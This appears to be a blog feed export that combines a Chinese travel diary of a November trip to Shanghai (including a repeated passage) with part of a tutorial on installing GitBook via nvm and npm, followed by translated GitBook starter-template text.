    吴淞江北

    吴淞江北

    ​来到了苏州河畔,这个仓库看上去还挺新的。

    西藏路桥
    西藏路桥

    西藏路桥

    ​又看到东方明珠了!

    The Joint Trust Warehouse

    ​没有想过这居然也是个人挤人的热门场馆……但是,我觉得里面基本没介绍什么淞沪会战的细节😵。

    枪林弹雨
    枪林弹雨

    枪林弹雨

    ​这个弹孔是现在复制而来的。据说特意把弹孔数量控制在了四百个(还是八佰?),对应着当时坚守四行仓库的战士们的数量。

    15:18 悠哈

    糖糖!

    15:24 棋牌文化博物馆🤩

    上海棋牌院

    ​里面有一个小小的棋牌博物馆。

    15:54 宝隆医院

    上海长征医院

    ​医院前身是 1900 年德国宝隆博士创办的“宝隆医院”,1930 年更名为“国立同济大学附属医院”,1948 年更名为“中美医院”;1955年 10 月,由时任国防部长彭德怀元帅签署命令,成立了“上海急症外科医院”;1958 年 9 月,列编为“第二军医大学第二附属医院”;1966 年 9 月,经上海市批准对外称“上海长征医院”;1997 年江泽民同志为医院题写了院名。

    16:01 国际饭店

    又回来了!

    依旧排得像个贪吃蛇

    16:12 蟹黄汤包

    鱼丸汤 蟹黄汤包

    佳家汤包

    ​这一条路都是吃的,除了价格惊人以外都是优点。四粒鱼丸汤¥12,10 粒蟹黄汤包¥38。早早吃完洗澡睡觉了。


    ​之后就是本次行程最刺激的环节了😵。觉得下午逛的地方没达预期,再加上又跑了一天属实有些劳累,就没跟家里人说,早早洗澡睡觉了。结果没回消息家里人觉得我出事了,直接让上海的亲戚过来打电话,后面还直接报警,不到 10 分钟警察直接找上门,搞得跟抓嫖娼一样,太可怕了😵。不会真觉得我会在中国第一城第一区里被抓去割腰子吧。

    这警察速度好快
    人都精神了
    不到 10 分钟,反应神速

    ​上海的亲戚还问我在上海玩了些啥,他们居然不知道四行仓库是什么🫢,也不知道天文馆在哪里,我计划去的地方都这么冷门的吗?然后说上海也就外滩和城隍庙比较有意思了。

    ​这么一折腾本来睡得香香的,最后又整到 11 点左右才接着睡了。

    ]]>
    + 前言
            

    ​我终于把万恶的小论文搞定了😭!解决完小论文这个问题,就可以先回家去面对更多的问题……

    去哪中转溜达
    当两天沪✌先

    ​本次回家决定中转一下上海!

    ​本次行程参观了许多博物馆,由于博物馆中图片和文字量密集,如果把它们全部放在一张网页里,将会占据大量版面,还会影响加载速度!因此,我决定将博物馆的相关内容放在子文章中。

    ​对于我来说,排版游记文章花费的时间要比旅游的时间还要多……所以有时间慢慢弄吧。

    正文

    11.4

    07:24 金灿灿

    保定的秋天

    ​要走的这天,雾霾终于散去了。

    ​今年的银杏要比去年早黄了两周左右。

    09:07 大红门

    大红门

    ​正常来讲,这个“寒假”比两年前还要长一些。

    ​再见了保定!G2602 09:49 保定东-11:00 天津西,¥57.5。

    11:04 天津西

    我需要便捷换乘!

    ​第一次试着自己坐高铁换乘。下车后找《便捷换乘》的电梯,直接坐出去。

    11:07 塑料大棚

    曾风餐露宿一晚

    ​那些事情,已经过去了快两年,不是吗?

    ​大名鼎鼎的京沪高铁只过天津南而不过天津西……按照两年前的方法,再转个车直接到天津南。G2653 11:32 天津西-11:46 天津南,¥20。

    11:38 天津天际线

    看到天塔了!

    ​左边的高楼是天津现代城二期,339.6m,右边就是天塔了,415.2m。

    ​天津的城建还是很顶的。很可惜这几年天津一直是衰落的状态。

    ​耳机里一直单曲循环着《GTAV》里的 BGM《No Happy Endings》。游戏中出现这首歌的时候是崔佛发现麦克十几年前就背叛了自己,独自一人前往白雪皑皑的北洋克顿挖了麦克的假坟墓寻求真相。整首歌有着一股快节奏又有些空灵的气氛。而天津大学又称之为北洋大学,又看着天津逐渐逐渐远去的高楼,感觉还挺应景😅。

    11:39 巨大烂尾楼

    北方第一高

    ​这回近距离观察了世界第一高烂尾楼😅。

    ​在我心目中,一些城市有着代表性的颜色:

    • 北京是红色,庄严肃穆,中国红。
    • 天津是蓝色,濒临渤海湾,津城里的各个建筑也都以蓝色调为主。
    • 保定是灰色,天天可爱小雾霾,还有我读研时的各种痛苦经历😭。
    • 武汉是橙色,黄鹤楼和鹦鹉洲长江大桥,以及过早的烟火气息。
    • 上海是暗金色,之后逛的好几个场馆都把灯光压的很暗,夜晚的外滩也有种黑色的深沉和金色的华丽。
    • 福州是绿色,一年四季都不落叶的地方🤧。

    ​其他地方,诸如石家庄、南昌、广州、杭州等,倒是没有一种固定的色彩。

    11:46 进站直梯

    我需要在天津南换乘!

    ​两年前天津南的保安大叔不让我们便捷换乘,而是迫使我们出站测个核酸再进去😵。其实这个车站是有便捷换乘这个选项的。

    11:49 故地重游

    这就是天津南!

    ​感觉比保定东还要小的高铁站……

    候车中

    ​所乘车次:G11 12:33 天津南-16:38 上海虹桥,¥609(好贵啊!)。

    ​这里有想过能不能直接改签到 G129,还能早点到上海,后来又觉得还是休息一下吧。

    ​之前的 G325 通往福州的车次还在,这么久的车实在是太牢了。

    12:31 京沪高铁

    京沪大标杆

    ​也算是体验到了一把全中国最牛的高铁了,可惜没得靠窗的位置。这个高铁又称最具有班味的高铁,很多人估计坐这条线只是为了出差,在车上也得打开电脑办公。

    超高速!

    ​尽管车速已经拉满,而且中间只停靠省会济南和南京,但还是觉得时间漫长。

    13:30 山东济南

    百里黄河!

    ​乘高铁火车跨过黄河多次,这回总算被我抓拍到了~

    15:27 江苏南京

    饮马长江!

    ​公元 450 年,元嘉草草,封狼居胥,赢得仓皇北顾。北魏太武帝拓跋焘南伐刘宋,直逼建康,饮马长江😠👊!

    16:38 上海虹桥

    人挤人

    ​又是一个巨大站,出站出口都要排一会儿队。虽然上海虹桥站在全国高铁站里不算大的,但是虹桥机场跟它是连一起的,这加起来就 very 的 big 了。

    沪币警告!

    ​知道上海物价很高,也没想过会这么高😵,好吧这是在火车站里,我拒绝!还是到民宿附近解决晚饭问题吧。

    16:55 上海地铁

    四通八达

    ​纵横交错的上海地铁,你甚至可以乘地铁直接去拙政园!

    地铁站

    ​走了老长一会儿,从《虹桥 2 号航站楼》上的车而不是从《虹桥火车站》,这证明我走错路了😵。

    ​虹桥 2 号航站楼-2 号线-人民广场,¥5。

    17:49 解决晚饭

    虾仁水饺

    ​到民宿附近了。整了份虾仁水饺,没几粒¥28🥴,但是虾仁是饱满的。比火车站的要好一点,我可以接受!

    ​然后整了杯益禾堂,¥17。

    18:04 奇异建筑

    UFO?

    ​出来就被两座造型怪异的大楼吸引。

    ​国际饭店,于民国二十三年(1934 年)12 月 1 日建成投用,自竣工起至 1982 年为上海市最高建筑,其楼顶中心旗杆于 1950 年 11 月确定为上海城市测绘平面坐标原点。

    ​上海新世界丽笙大酒店由上海新世界股份有限公司投资兴建,由卡尔森环球酒店集团亚太公司管理,是其在中国管理的最大规模的“丽笙”品牌酒店。

    ​定的酒店位于黄河路 127 号,国际饭店楼下拐进去,三个晚上¥491.40,平均一个晚上¥163.8。房间很小,没窗户,但是有个洗衣机,我可以接受!

    ​国际饭店有卖西饼的地方,整个周围全是西饼奶油的味道,给我香迷糊了🤤。

    ​上海位于华东最东,天黑的可早,在酒店里洗了个澡躺一躺,差不多可以出去看看外滩了。

    19:23 闽菜

    新闽记

    ​坛起荤香飘四邻 佛闻弃禅跳墙来

    ​新闽记在保留古法传统技艺的前提下,食材甄选,烹调讲究,为食客呈现一道既充满情怀亦能代表闽菜文化的饕餮盛宴。

    ​新闽记甄选品质上乘福建漳港海蚌配以多种珍惜食材耗费数时熬制上好的“三茸汤”,待上席时,煮沸的鸡汤当席汆鲜肉,即刻体验闽菜之“清淡鲜脆”、“醇厚隽永”的至高味觉享受。

    ​看到一家闽菜馆,介绍的两种食物是我这个福建人基本没咋吃过的东西,这个闽菜之后更是听都没听说过😪。不过看这个文案,进去的客人得被狠狠宰一笔。

    19:27 南京路步行街🤩

    有点像江汉路

    ​又是一个到处卖东西的商业街了,想过这里人会很多,但还是比海心沙要好。

    ​这边有非常多的警察维持秩序。

    永安百货

    ​永安百货,简称永安,创办于 1907 年 6 月 28 日,是中国香港其中一家历史最悠久的连锁百货店,既是香港第二大华资百货公司,亦是早年上海南京路四大华资百货公司之一(当年先施公司、永安公司、新新公司和大新公司被合称为后四大公司)。

    上海时装商店

    ​上海时装商店(原先施公司)由德和洋行设计,是上海的“四大百货公司”之一,建筑整体为文艺复兴风格,装饰以巴洛克风格元素,现为上海时装商店。

    老凤祥银楼

    ​老凤祥。 老凤祥是国内唯一的由一个半世纪前相传下来的百年老店。上海老凤祥有限公司正是由创始于 1848 年的老凤祥银楼发展沿革而来,其商标“老凤祥”的创意,也源于老凤祥银楼的字号。

    慈安里大楼

    ​慈安里大楼位于上海市黄浦区南京东路 114 号,建于清光绪三十二年(1906 年),是 20 世纪外滩地段清水砖墙老大楼的典型代表之一,由英商爱尔德公司设计,采用法国文艺复兴风格。最初是上海的第一家百货公司,1999 年入选上海市第三批优秀历史建筑。

    东方明珠

    ​越靠近外滩,人越多。

    和平饭店

    The Palace Hotel

    ​和平饭店,原名华懋饭店,属芝加哥学派哥特式建筑。饭店位于上海的南京东路和外滩的交叉口。1929 年,犹太商人 Victor Sassoon 构思并创建了名为“华懋饭店 (Cathay Hotel)”的酒店,这就是后来的和平饭店。

    19:51 外滩系列🤩

    挤出来了!

    ​离开了老上海,引入眼帘的是浦东新上海!

    南京东路口

    ​外滩十八号,位于上海市外滩南京路口,原为英国渣打银行驻中国的总部。原名麦加利银行的外滩十八号,建于 1923 年。

    The Palace Hotel

    ​和平饭店南楼整体外观集中体现了文艺复兴形式,将英国维多利亚风格的砖砌效果与维多利亚后期的安妮女王复兴风格完全地揉和在一起,红砖饰带和楣式的处理手法表现了建筑师在求变与动感,以色彩和材质的对比达到装饰效果。

    字林西报大楼旧址(左)

    The North China Daily News Building

    ​字林西报大楼于 1923 年竣工(1951 年改名为桂林大楼),曾是当年外滩最高的大楼。《字林西报》的前身是创刊于 1850 年 8 月 30 日的英文《北华捷报》,为中国境内第一份新闻报纸,创办人是英国来沪的拍卖商奚尔门。

    和平饭店:北楼

    The Palace Hotel

    ​和平饭店北楼立面处理表现了装饰艺术风格,整体仅以竖向线条作为装饰主体,在檐部及基座部分使用抽象几何形装饰母题,并在各入口处、檐部正中等处,用反映业主身份的沙逊家族猎狗族徽作为装饰中心;外墙除第 9 层和顶部用泰山石面砖外,其余各层均用花岗石作贴面;在金字塔顶的周围还有四个非洲原始部落图腾似的装饰物。

    江海关

    ​读研三年成功打卡旧中国时期最有名的三个海关大楼:江汉关、粤海关和江海关!

    The Custom House

    ​海关大楼位于中山东一路 13 号,于 1925 年 12 月 15 日奠基,1927 年 12 月 19 日启用。这幢建筑占地面积为 5000㎡,建筑面积为 32500㎡,采用简化的新古典主义风格,其体量感带有现代建筑的一些影响。海关大楼与汇丰银行大楼共同构成外滩建筑天际线构图的一个中心,成为外滩建筑群中两幢最有代表性的建筑。

    老-陆家嘴
    新-陆家嘴

    一十四年

    ​十四年后,陆家嘴的高楼大厦更密集了!

    ​当时的老照片居然没有往右边多拍一点……

    ​PS 调色用的 Camera Row 滤镜:

    属性数值
    曝光-0.40
    对比度+70
    高光+26
    阴影-43
    白色-21
    黑色-5
    纹理+7
    清晰度+3
    去除薄雾+21
    东方明珠 三件套

    东方明珠与三件套

    ​尽管东方明珠实际上并没有环球金融中心和上海中心大厦高,但是由于透视关系,东方明珠还是显得更高些。

    浦东发展银行大楼

    The Hongkong and Shanghai Bank Building

    ​汇丰银行大楼,原指香港上海汇丰银行于 1923 年至 1955 年在上海的分行大楼,位于上海外滩 12 号,又名市府大楼,今天是上海浦东发展银行的总部驻地。1921 年 5 月 5 日大楼开工,1923 年 6 月 23 日建成,被认为是中国大陆近代西方古典主义建筑的最高杰作。大楼的设计者是著名的英资建筑设计机构公和洋行(Palmer & Turner Architects and Surveyors)

    皇冠大楼!

    The Great Northern Telegraph Company Building

    ​大北电报公司大楼,位于上海市中山东一路 7 号,为外滩风景线的组成部分之一。大楼所在土地,最初为美商旗昌洋行所有,后转入轮船招商局名下,大北电报远东公司则租借土地的使用权兴建该楼。1949 年以后,大楼为长江航运管理局所使用,泰国盘古银行上海分行为该建筑的使用者。大楼建于 1906 年,翌年建成,为欧洲文艺复兴建筑式样,1994 年该建筑入选上海市优秀历史建筑名录。

    The Westin Bund Center Shanghai

    ​上海威斯汀大饭店,坐落于举世闻名的上海外滩,楼高 26 层,由万豪国际酒店集团公司进行管理,2400 平方米的酒店大堂是上海少有的超五星级酒店大堂之一,挑高 26.5 的大堂中庭气宇轩昂,其中连接 4 个楼层的玻璃天梯更为匠心独具。

    The China Merchants Steam Navigation Company Building

    ​轮船招商局简称“招商局”,是中国近代史上第一家轮船运输企业,也是中国第一家近代民用企业,是由李鸿章发起的“官督商办企业”。企业由商人出资,合股的资本为商人所有,公司按照自己的规范章程制度管理。企业在政府监督之下,但是盈亏全归商办,与官无涉。

    大北电报公司大楼

    中国通商银行大楼

    The Russell & Co. Building

    ​中国通商银行大楼(外滩)是中国通商银行在上海外滩 6 号建造的银行大楼。是中国人创办的第一所银行,成立于 1897 年 5 月 27 日,创办人是盛宣怀。外滩 6 号原来是一家拍卖行,3 层殖民地式建筑。1906 年翻建,由英资玛礼逊洋行的格兰顿(F . M . Gratton)设计,建筑面积 4541 平方米,建筑风格为仿哥特式市政厅式样。顶部有一排尖顶。该大楼于 1906 年建造。开创时参照英商汇丰银行的管理办法。该行成立之初,国家即授予发行银元、银两的特权。

    最后两套!

    The McBain Building

    ​亚细亚大楼位于上海市延安东路外滩,中山东一路 1 号,上海解放后由上海市冶金设计院使用,一般也叫“冶金设计院大楼”,而年纪稍大的人仍习惯称它为“亚细亚大楼”。此楼建成于 1916 年,高 7 层,是当时外滩最高的一幢建筑,且又取得中山东路 1 号的门牌,故当时也有人称它为“外滩第一楼”。

    The Shanghai Club

    ​上海总会大楼是上海外滩建筑群中的一座著名建筑,位于上海外滩 2 号。 上海总会是英国在沪侨民的俱乐部,一个重要的社交场所,创设于 1861 年。1864 年建楼。1909 年在原址建 6 层新楼,1910 年 1 月启用。新楼占地 1811 平方米,建筑面积 9280 平方米。建筑立面为三段式处理,2-3 层中部有 6 根爱奥尼柱式的石柱,顶端各设置了巴洛克式的风亭,细部雕刻细腻优美。建筑设计师是 H.TARRANT。室内装潢由马海洋行的日本建筑师设下田菊太郎设计,装饰华丽,以长达 34 米的黑白大理石酒吧柜台著称。

    20:27 豫园商城-夜

    卖东西了!

    ​本来是想直接沿着九江路回去的,结果发现走远了,找一个就近的地铁站,豫园站。

    ​看小红书说晚上的豫园很好看,结果根本就没开门😅,估计是想说这个豫园商城吧。看上去全是崭新的仿古建筑。

    三吴之地

    ​上海也是个江南地区。这个灯打在传统苏式建筑上显得魔幻😵‍💫。

    20:56 国际饭店

    不排队了,但还是香迷糊了

    ​豫园-14 号线-大世界-8 号线-人民广场,¥3。

    ​该回酒店再洗个澡开躺了!发现国际饭店西饼屋门口都没人了,这才发现人家已经下班了😵。

    ​看了下到底是个啥玩意会引得这么多人排队?

    温馨提示

    尊敬的消费者

    上海国际饭店帆声西饼屋生产的一系列食品长期以来一直受到消费者的喜爱和认可,为此饭店表示衷心的感谢!由于蝴蝶酥等明星产品已成为市民、消费者竞相购买的热卖产品,为了提升您的购物体验度,饭店特此温馨提示如下:

    1. 请消费者有序排队,不要拥挤,严禁插队现象发生;
    2. 黄河路 28 号帆声西饼屋是国际饭店唯一官方门店。除此以外,饭店在奥乐齐超市、永安百货、汇金百货邵万生、三阳、新长发、老同盛等专柜均有饭店提供的蝴蝶酥等相关产品同步售卖。在此,提醒广大消费者请认准正规渠道购买国际饭店生产的蝴蝶酥等产品。
    3. 如发现不合理现象,可向我们门店及时反映,我们将与您共同营造一个温馨、有序、良好的购物环境。

    11.5

    06:28 十里香馄饨王

    老上海福建馄饨

    ​黄河路一条路基本都是吃的,找了家馄饨店解决早饭问题,¥14。扫码时发现这是个福建馄饨店。

    ​记得 14 年前每次都在光启南路的馄饨店吃早饭,当时那个老板也是福建的来着。

    明天广场

    ​明天广场,既有商业用房、公寓,酒店、商场、风味餐厅又有会议中心及宴会厅和健康设施,五十七至五十八层还设置为总统套房。是上海第六高的摩天大楼。地上 60 层,地下 3 层,高约 285 米,于 2003 年 10 月 1 日落成。

    ​上海 03 年的房子放到现在的河北都是第一高楼了……

    ​本来第一站是要去徐汇的游戏博物馆的,但是要 10 点才开门,于是我决定先去南边的世博园打发下时间。

    07:10 世博园系列🤩

    世博园地铁站

    ​人民广场-8 号线-中华艺术宫,¥3。

    ​世博园地铁站还挂着当年世博会的照片和画。

    世博源

    ​世博会的场馆基本都拆得差不多了,走马观花地看一些特别的场馆吧。

    中国馆

    ​中华艺术宫选址 2010 年上海世博会中国馆,总建筑面积达到 16.68 万平方米,拥有展示面积近 7 万平方米,共分为 6 个展示层面、35 个展厅,分别为 60 米层、49 米层、41 米层、33 米层、5 米层和 0 米层。中华艺术宫拥有 1.4 万件馆藏品,首批展出 1400 多件。中华艺术宫的艺术品分类由国画、油画、书法、版画、雕塑、皮影等组成。

    ​之后我想骑个共享单车去看卢森堡展馆,为什么呢?因为有了瓶醋想包一盘饺子。

    过气网红

    ​甚至已经掉色严重。

    梅赛德斯·奔驰中心

    ​还以为是当年大名鼎鼎的沙特馆,查了下并不是。

    大克鼎

    ​还以为是国博里的大盂鼎,查了下并不是,应该是上海博物馆镇馆之宝大克鼎。

    老-卢森堡大公国世博馆
    新-卢森堡大公国世博馆

    卢森堡大公国世博馆

    ​骑了这么久,就为了拍这张照片!

    ​曾经的世博园人挤人,现在周围一个人都没有。本来想找个人帮我拍一张的,只好那矿泉水瓶把手机架椅子上录像截屏了。

    世博园地图

    ​这附近也是一个地铁站也没有,只好硬着头皮走去最近的后滩站了。

    意大利馆 法国馆 俄罗斯馆

    意大利馆、法国馆、俄罗斯馆

    卢浦大桥

    ​卢浦大桥后的上海中心大厦。

    温室花园 温室花园

    温室花园

    08:34 要上班了!

    一股班味

    ​OK,终于腿到地铁站了!后滩站-7 号线-肇家浜路-9 号线-漕河泾开发区,¥4。

    ​到了上班高峰,地铁里的人开始多了起来,但看着没有北京广州那么夸张。

    08:56 Welcome to CHJ

    全是办公楼!

    ​一股闽侯高新区的感觉……

    08:57 中国音数协游戏博物馆🤩

    新研大厦

    ​这个博物馆居然要 10:00 才开门,还是来早了😵。在旁边看个纪录片休息一下吧。

    花里胡哨

    ​门票¥38。这个博物馆里除了我就是工作人员了……如果看过央美×中传游研社 电子游戏史这个系列的视频的话,对这个博物馆里的绝大多数东西还是能够了解的。里面的东西挺精美,但是感觉馆里对早期的游戏发展介绍比较齐全,对于 21 世纪后的游戏几乎没有什么介绍,简单地一笔带过了。

    11:46 上海电影博物馆🤩

    上海电影集团

    ​想想到了徐汇了就再逛逛徐汇的地标。桂箐路钦江路-927 路-漕溪北路裕德路,¥2。

    当当当!

    ​来到了上海电影博物馆!门票居然要¥60……自己对电影了解的属实是不够多,看得不是很懂😬。

    12:49 徐家汇圣母院

    徐家汇圣母院

    ​1867 年,郎怀仁主教邀请拯亡会修女来上海协助传教。1868 年他在徐家汇耶稣会总院东侧建造新楼,于翌年竣工。1869 年,献堂会被批准正式成立并迁至新楼内,第一批拯望会修女也定居于此,承担培养贞女的任务。是年 9 月 8 日,初学院举行开幕礼并招收 32 位贞女。徐家汇圣母院由此最终形成。

    12:51 徐家汇站

    中国游戏看上海 上海游戏看徐汇

    ​教堂在马路另一边,没路口过马路,只好从地铁站窜过去。

    12:56 徐家汇天主教堂🤩

    圣心大教堂
    徐家汇天主教堂
    圣心大教堂
    徐家汇天主教堂
    圣心大教堂
    徐家汇天主教堂

    圣心大教堂 VS 徐家汇天主教堂

    ​这简直就是广州圣心大教堂的红色版!

    徐家汇天主教堂 徐家汇天主教堂 徐家汇天主教堂

    徐家汇天主教堂

    ​对游客来说,比圣心大教堂更好的是,这里似乎不怎么做礼拜,所以可以直接进去参观,没有什么限制!

    徐家汇天主教堂 徐家汇天主教堂 徐家汇天主教堂

    洋庙

    ​之后就该撤了!本来这里有个徐家汇书院值得一逛,但是我觉得进去一阵拍打扰别人读书不太好就直接回去了。徐家汇站-1 号线-人民广场,¥3。

    13:33 苔圣园酒家

    苔圣园酒家

    ​回去充个电躺一躺!据说酒店所处的黄河路是《繁花》的取景地,然而我并没有看过这个电视剧……

    14:38 四行仓库🤩

    吴淞江北
    吴淞江北

    吴淞江北

    ​来到了苏州河畔,这个仓库看上去还挺新的。

    西藏路桥
    西藏路桥

    西藏路桥

    ​又看到东方明珠了!

    The Joint Trust Warehouse

    ​没有想过这居然也是个人挤人的热门场馆……但是,我觉得里面基本没介绍什么淞沪会战的细节😵。

    枪林弹雨
    枪林弹雨

    枪林弹雨

    ​这个弹孔是现在复制而来的。据说特意把弹孔数量控制在了四百个(还是八佰?),对应着当时坚守四行仓库的战士们的数量。

    15:18 悠哈

    糖糖!

    15:24 棋牌文化博物馆🤩

    上海棋牌院

    ​里面有一个小小的棋牌博物馆。

    15:54 宝隆医院

    上海长征医院

    ​医院前身是 1900 年德国宝隆博士创办的“宝隆医院”,1930 年更名为“国立同济大学附属医院”,1948 年更名为“中美医院”;1955年 10 月,由时任国防部长彭德怀元帅签署命令,成立了“上海急症外科医院”;1958 年 9 月,列编为“第二军医大学第二附属医院”;1966 年 9 月,经上海市批准对外称“上海长征医院”;1997 年江泽民同志为医院题写了院名。

    16:01 国际饭店

    又回来了!

    依旧排得像个贪吃蛇

    16:12 蟹黄汤包

    鱼丸汤 蟹黄汤包

    佳家汤包

    ​这一条路都是吃的,除了价格惊人以外都是优点。四粒鱼丸汤¥12,10 粒蟹黄汤包¥38。早早吃完洗澡睡觉了。


    ​之后就是本次行程最刺激的环节了😵。觉得下午逛的地方没达预期,再加上又跑了一天属实有些劳累,就没跟家里人说,早早洗澡睡觉了。结果没回消息家里人觉得我出事了,直接让上海的亲戚过来打电话,后面还直接报警,不到 10 分钟警察直接找上门,搞得跟抓嫖娼一样,太可怕了😵。不会真觉得我会在中国第一城第一区里被抓去割腰子吧。

    这警察速度好快
    人都精神了
    不到 10 分钟,反应神速

    ​上海的亲戚还问我在上海玩了些啥,他们居然不知道四行仓库是什么🫢,也不知道天文馆在哪里,我计划去的地方都这么冷门的吗?然后说上海也就外滩和城隍庙比较有意思了。

    ​这么一折腾本来睡得香香的,最后又整到 11 点左右才接着睡了。

    ]]>
    @@ -305,7 +305,7 @@ /posts/Web-GitBook/ - 资源

    安装

    ​有两种方式可以配置 GitBook:

    ​本地版:

    ​网页版:

    规则

    开始

    本地版

    安装 nvm

    ​这个 GitBook 的本地版年久失修很久了,用新的 Node.js 会出现兼容问题……得整一个 nvm。

    ​把原有的 Node.js 卸了,装 nvm。

    ​命令行查看 nvm 版本:

    nvm version
    1.1.12

    安装 npm

    找到 nvm 安装的路径,修改 settings.txt 下的内容以配置镜像:

    root: C:\Users\XXX\AppData\Roaming\nvm
    path: C:\Program Files\nodejs
    node_mirror: https://npmmirror.com/mirrors/node/
    npm_mirror: https://npmmirror.com/mirrors/node/

    ​这边还是下载失败,只好像安装 pytorch 一样离线安装了……

    ​从 Node.js 中文网 — 下载 Node.js® 想要版本的 预构建二进制文件,解压出来并改名:

    webp

    ​以此法装一个最新的 Node.js(v22.11.0) 和支持 GitBook 的 Node.js(v10.24.1)。命令行查看是否安装成功:

    nvm list
    22.11.0
    10.24.1

    ​激活!

    nvm use 10.24.1

    ​查看下载源:

    npm config get registry
    https://registry.npmjs.org/

    ​切换镜像:

    npm config set registry https://registry.npmmirror.com

    安装 GitBook

    ​安装 GitBook CLI:

    npm install -g gitbook-cli

    ​查看安装情况:

    gitbook -V
    CLI version: 2.3.2
    Installing GitBook 3.2.3
    gitbook@3.2.3 C:\Users\19048\AppData\Local\Temp\tmp-44796f14sHIZaeO0a\node_modules\gitbook
    ├── escape-html@1.0.3
    ...
    └── npm@3.9.2
    GitBook version: 3.2.3

    ​在项目文件夹下初始化 GitBook:

    gitbook init
    warn: no summary file in this book
    info: create README.md
    info: create SUMMARY.md
    info: initialization is finished

    ​查看帮助:

    gitbook help
    命令描述选项/参数
    build [book] [output]构建一本书–log: 日志级别(默认是 info,可选:debug, info, warn, error, disabled)
    --format: 构建格式(默认是 website,可选:website, json, ebook)
    --[no-]timing: 打印调试信息(默认是 false)
    serve [book] [output]将书籍作为网站提供测试服务–port: 服务器监听的端口(默认是 4000)
    --lrport: 直播重载服务器的端口(默认是 35729)
    --[no-]watch: 启用文件监视和实时重载(默认是 true)
    --[no-]live: 启用实时重载(默认是 true)
    --[no-]open: 启用在浏览器中打开书籍(默认是 false)
    --browser: 指定用于打开书籍的浏览器(默认是空)
    --log: 日志级别(默认是 info,可选:debug, info, warn, error, disabled)
    --format: 构建格式(默认是 website,可选:website, json, ebook)
    install [book]安装所有插件的依赖–log: 日志级别(默认是 info,可选:debug, info, warn, error, disabled)
    parse [book]解析并打印书籍的调试信息–log: 日志级别(默认是 info,可选:debug, info, warn, error, disabled)
    init [book]设置并创建章节文件–log: 日志级别(默认是 info,可选:debug, info, warn, error, disabled)
    pdf [book] [output]将书籍构建成电子书文件–log: 日志级别(默认是 info,可选:debug, info, warn, error, disabled)
    epub [book] [output]将书籍构建成电子书文件–log: 日志级别(默认是 info,可选:debug, info, warn, error, disabled)
    mobi [book] [output]将书籍构建成电子书文件–log: 日志级别(默认是 info,可选:debug, info, warn, error, disabled)

    ​编译:

    gitbook build

    ​得到网页文件:

    演示

    网页版

    ​按 GitBook 步骤走就行。得到一个域:Welcome | Zi-Zi’s Jounery

    ​使用 Edit in change requset 编辑,使用 Merge 编译。

    说明(网页版)

    Welcome

    Welcome to the GitBook Starter Template! Here you’ll get an overview of all the amazing features GitBook offers to help you build beautiful, interactive documentation.

    ​欢迎使用 GitBook 入门模板!在这里,您将获得 GitBook 提供的所有惊人功能的概述,以帮助您构建美观、交互式的文档。

    You’ll see some of the best parts of GitBook in action — and find help on how you can turn this template into your own.

    ​您将看到 GitBook 的一些最佳部分正在发挥作用,并找到如何将此模板转化为自己的帮助。

    Getting Started

    Quickstart

    Beautiful documentation starts with the content you create — and GitBook makes it easy to get started with any pre-existing content.

    ​漂亮的文档从你创建的内容开始——GitBook 让你很容易开始使用任何预先存在的内容。

    Import

    GitBook supports importing content from many popular writing tools and formats. If your content already exists, you can upload a file or group of files to be imported.

    ​GitBook 支持从许多流行的写作工具和格式导入内容。如果您的内容已经存在,您可以上传一个或一组要导入的文件。

    png

    Sync a repository

    GitBook also allows you to set up a bi-directional sync with an existing repository on GitHub or GitLab. Setting up Git Sync allows you and your team to write content in GitBook or in code, and never have to worry about your content becoming out of sync.

    ​GitBook 还允许您与 GitHub 或 GitLab 上的现有存储库设置双向同步。设置Git Sync 允许您和您的团队在 GitBook 或代码中编写内容,而无需担心您的内容会不同步。

    Publish your docs

    Once you’ve finished writing, editing, or importing your content, you can publish your work to the web as a docs site. Once published, your site will be accessible online only to your selected audience.

    ​一旦你完成了写作、编辑或导入内容,你就可以将你的作品作为文档网站发布到网上。一旦发布,您的网站将仅对选定的受众在线访问。

    You can publish your site and find related settings from your docs site’s homepage.

    ​您可以在文档网站的主页上发布您的网站并查找相关设置。

    webp

    Basics

    Editor

    GitBook has a powerful block-based editor that allows you to seamlessly create, update, and enhance your content.

    ​GitBook 有一个强大的基于块的编辑器,可以让你无缝地创建、更新和增强你的内容。

    avif

    Writing content

    GitBook offers a range of block types for you to add to your content inline — from simple text and tables, to code blocks and more. These elements will make your pages more useful to readers, and offer extra information and context.

    ​GitBook 提供了一系列块类型供您内联添加到内容中——从简单的文本和表格到代码块等等。这些元素将使您的页面对读者更有用,并提供额外的信息和背景。

    Either start typing below, or press / to see a list of the blocks you can insert into your page.

    ​请在下面开始键入,或按 / 查看可以插入页面的块列表。

    Markdown

    GitBook supports many different types of content, and is backed by Markdown — meaning you can copy and paste any existing Markdown files directly into the editor!

    ​GitBook 支持许多不同类型的内容,并由 Markdown 支持——这意味着您可以将任何现有的 Markdown 文件直接复制粘贴到编辑器中!

    webp

    Feel free to test it out and copy the Markdown below by hovering over the code block in the upper right, and pasting into a new line underneath.

    ​您可以随意测试它,并将鼠标悬停在右上角的代码块上,然后粘贴到下面的新行中,复制下面的 Markdown。

    # Heading

    This is some paragraph text, with a [link](https://docs.gitbook.com) to our docs.

    ## Heading 2
    - Point 1
    - Point 2
    - Point 3

    ​If you have multiple files, GitBook makes it easy to import full repositories too — allowing you to keep your GitBook content in sync.

    ​如果你有多个文件,GitBook 也可以轻松导入完整的存储库,让你的 GitBook 内容保持同步。

    Images & media

    GitBook allows you to add images and media easily to your docs. Simply drag a file into the editor, or use the file manager in the upper right corner to upload multiple images at once.

    ​GitBook 允许您轻松地将图像和媒体添加到文档中。只需将文件拖动到编辑器中,或使用右上角的文件管理器一次上传多张图像。

    avif

    You can also add images simply by copying and pasting them directly into the editor — and GitBook will automatically add it to your file manager.

    ​您还可以通过将图像直接复制并粘贴到编辑器中来添加图像,GitBook 会自动将其添加到您的文件管理器中。

    Interactive blocks

    In addition to the default Markdown you can write, GitBook has a number of out-of-the-box interactive blocks you can use. You can find interactive blocks by pressing / from within the editor.

    ​除了你可以编写的默认 Markdown 之外,GitBook 还有许多你可以使用的开箱即用的交互式块。您可以通过在编辑器中按 / 找到交互式块。

    avif

    Tabs

    Each tab is like a mini page — it can contain multiple other blocks, of any type. So you can add code blocks, images, integration blocks and more to individual tabs in the same tab block.

    ​每个选项卡都像一个迷你页面——它可以包含多个其他任何类型的块。因此,您可以将代码块、图像、集成块等添加到同一选项卡块中的各个选项卡中。

    Add images, embedded content, code blocks, and more.

    ​添加图像、嵌入式内容、代码块等。

    const handleFetchEvent = async (request, context) => {
    return new Response({message: "Hello World"});
    };

    Expandable sections

    Click me to expand

